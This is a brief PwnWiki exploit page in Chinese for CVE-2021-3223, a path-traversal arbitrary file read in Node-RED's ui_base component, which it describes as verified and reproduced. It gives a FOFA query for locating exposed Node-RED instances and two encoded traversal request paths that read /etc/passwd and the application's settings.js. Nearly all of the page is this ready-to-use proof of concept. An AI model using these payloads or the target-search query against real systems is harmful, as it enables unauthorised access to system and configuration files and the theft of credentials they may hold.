CVE-2021-3223 Node-RED ui base 任意文件讀取漏洞
From PwnWiki
| 該漏洞已通過驗證
本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。 |
漏洞影響
Node-RED
FOFA
title="Node-RED"
POC
/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /ui_base/js/..%2f..%2f..%2f..%2fsettings.js